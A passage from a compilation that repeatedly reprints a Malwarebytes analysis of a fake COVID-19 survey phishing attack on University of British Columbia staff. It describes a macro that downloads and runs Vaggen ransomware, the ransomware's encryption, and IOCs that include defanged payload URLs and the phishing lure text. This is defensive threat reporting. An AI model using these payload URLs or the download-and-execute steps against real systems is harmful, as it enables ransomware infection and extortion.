3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 555 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 556 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 557 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 558 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 559 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 560 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 561 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 562 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 563 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 564 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 565 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 566 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 567 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 568 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 569 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 570 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 571 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 572 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 573 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 574 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 575 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 576 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 577 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 578 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 579 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 580 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 581 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 582 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 583 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 584 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 585 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 586 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 587 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 588 of 